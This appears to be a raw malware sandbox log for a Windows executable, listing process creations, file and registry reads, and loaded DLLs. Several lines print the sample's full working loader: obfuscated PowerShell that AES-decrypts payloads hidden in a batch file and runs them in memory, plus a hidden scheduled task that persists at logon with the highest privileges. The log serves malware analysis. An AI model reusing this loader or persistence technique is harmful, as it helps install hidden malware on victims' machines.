Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jcgLYlM4dg.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File read: C:\Users\user\Desktop\jcgLYlM4dg.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jcgLYlM4dg.exe "C:\Users\user\Desktop\jcgLYlM4dg.exe"
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
